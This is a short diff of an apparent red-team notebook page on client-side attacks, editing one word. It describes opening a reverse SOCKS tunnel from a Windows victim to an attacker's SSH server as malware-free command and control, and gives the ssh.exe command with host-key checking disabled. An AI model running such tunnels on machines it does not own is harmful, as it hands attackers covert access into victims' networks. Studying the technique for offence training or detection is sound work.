U53RW4R3/SCPA/Notebook/07 - Tactics & Techniques & Procedures (TTPs) Phases/C - Initial Access/0x01 - Weaponization/0xC - Client-Side Attacks/Delivery Methods/Command and Scripting Interpreter/Desktop/Windows/Command Execution/Remote Clients.md

 ### Reverse Tunneling SOCKS Proxy

 Instead of dropping malware instead we'll use `proxychains` or `privoxy` with the SSH server (the attacker's server) as the command and control which is legitimate, safer, and more familiar performing things remotely.
-This is considered as a non-malware implant.
+This is considered as a non-malware payload.

 ```
 C:\Windows\System32\OpenSSH\ssh.exe [-p <PORT>] -NTfCqR [127.0.0.1:]<SOCKS_proxy> -o "StrictHostKeyChecking=no"